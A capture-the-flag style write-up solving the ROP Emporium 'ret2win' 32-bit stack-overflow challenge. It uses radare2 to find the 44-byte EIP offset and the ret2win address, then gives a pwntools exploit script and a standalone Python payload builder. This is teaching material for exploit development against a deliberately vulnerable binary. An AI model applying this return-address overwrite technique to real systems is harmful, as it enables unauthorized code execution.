Rop Emporium Ret2win 32 bit

Get Offset to EIP

Generate a 100-byte De Bruijn pattern with ragg2 (`-P 100` sets the length, `-r` prints the raw bytes instead of hex pairs). Every 4-byte window of the pattern is unique, so whatever value ends up in EIP identifies exactly one position in the input:

```console
ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
```
Open the binary in radare2: `doo` reopens it under the debugger, `dc` runs it, and the pattern is pasted as the program's input. The process faults with EIP = 0x41415041, which is the little-endian encoding of the pattern bytes `APAA`; `wopO` then reports where that value sits in the pattern:

```console
r2 ret2win32
[0x08048430]> doo
File dbg:///home/hacker/challenges/binexp/STACK/rop_emporium_all_challenges/Ret2win/x86/ret2win32 reopened in read-write mode
[0xeb565bd0]> dc
ret2win by ROP Emporium
x86

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
Thank you!
[+] SIGNAL 11 errno=0 addr=0x41415041 code=1 si_pid=1094799425 ret=0
[0x41415041]> dr
eax = 0x0000000b
ebx = 0xeb520e34
ecx = 0xeb5228a0
edx = 0x00000000
esi = 0x08048660
edi = 0xeb57eb60
esp = 0xffd1d630
ebp = 0x414f4141
eip = 0x41415041
eflags = 0x00010286
oeax = 0xffffffff
[0x41415041]> wopO `dr eip`
44
[0x41415041]>
```

Offset = 44. Those 44 bytes cover the 32-byte buffer, the remaining stack frame padding and the 4-byte saved EBP (note that EBP was also clobbered with pattern bytes, 0x414f4141), so the 4 bytes that follow land on the saved return address and are popped into EIP when pwme returns.


Ret2win Function address

```console
rabin2 -s ret2win32
[Symbols]

nth paddr      vaddr      bind   type   size lib name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
-- <snipped> --
36  0x000005ad 0x080485ad LOCAL  FUNC   127      pwnme
37  0x0000062c 0x0804862c LOCAL  FUNC   41       ret2win
38  ---------- 0x00000000 LOCAL  FILE   0        crtstuff.c
-- <snipped> --
```

ret2win address = 0x0804862c. The binary is not position-independent (it is mapped at the fixed 0x08048000 base), so this address is the same on every run and no leak is needed; it also contains no null bytes, although read() would have accepted them anyway.


Exploit

```python
#!/usr/bin/env python3
from pwn import *

ret = p32(0x0804862c)    # address of ret2win(), packed little-endian
offset = 44              # bytes from the start of the buffer to the saved return address

payload = b'A' * offset  # fill the buffer, the frame padding and the saved EBP
payload += ret           # overwrite the saved return address so ret pops ret2win() into EIP

# 48 bytes plus the newline sendline() appends stays within the 56 bytes read() accepts
p = process("./ret2win32")
p.sendline(payload)
p.interactive()
```

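The two manual steps above, locating the crashed EIP value inside the pattern and laying out the payload, can be checked offline without radare2 or pwntools. The following is an added example written for this writeup, not code from the original post or from ROP Emporium: it regenerates the pattern with the classical De Bruijn construction (order 3 over the uppercase/lowercase/digit charset, which reproduces the `ragg2 -P 100 -r` output shown earlier), looks up the EIP value the way `wopO` does, and builds the same payload with `struct.pack` in place of `p32`. The ret2win address 0x0804862c, the crash value 0x41415041 and the 56-byte read limit are taken from the writeup; the charset order is an assumption that the first assertion on the generated pattern verifies.

```python
import struct

# Assumed ragg2 charset order (uppercase, lowercase, digits). The order-3
# De Bruijn sequence over it starts "AAABAACAAD...", the same bytes that
# `ragg2 -P 100 -r` printed in the writeup.
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def de_bruijn(alphabet: str = CHARSET, n: int = 3, length: int = 100) -> bytes:
    """First `length` bytes of the De Bruijn sequence B(k, n), generated with
    the Fredricksen-Kessler-Maiorana algorithm. Every n-byte window is unique,
    so any 4-byte value read out of EIP maps to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:      # stop as soon as enough bytes exist
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq[:length]).encode()


def cyclic_find(eip: int, pattern: bytes) -> int:
    """Offset of the 4 bytes that landed in EIP, or -1 if they are not part of
    the pattern. x86 is little-endian, so EIP = 0x41415041 means the bytes
    b'APAA' were popped; an EIP of 0x41414141 ('AAAA') never occurs in a
    De Bruijn pattern and signals that the crash came from other input."""
    needle = struct.pack("<I", eip)
    return pattern.find(needle)


RET2WIN = 0x0804862C   # ret2win() from rabin2 -s; the binary is not PIE
READ_LIMIT = 56        # bytes pwnme() reads, per the program banner


def build_payload(offset: int, target: int = RET2WIN) -> bytes:
    """Padding up to the saved return address, then the target address.
    Refuses payloads read() would truncate."""
    payload = b"A" * offset + struct.pack("<I", target)
    if len(payload) > READ_LIMIT:
        raise ValueError(f"payload is {len(payload)} bytes, read() only takes {READ_LIMIT}")
    return payload


if __name__ == "__main__":
    pattern = de_bruijn()
    print(pattern.decode())                        # identical to the ragg2 output
    offset = cyclic_find(0x41415041, pattern)      # EIP value from the SIGSEGV
    print("offset:", offset)
    print("payload:", build_payload(offset).hex())
```

The pattern matching step is what `wopO` automates inside radare2; doing it by hand shows why the register value must be packed little-endian before searching, which is the usual mistake when reading EIP off a crash by eye.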

This post is licensed under CC BY 4.0 by the author.
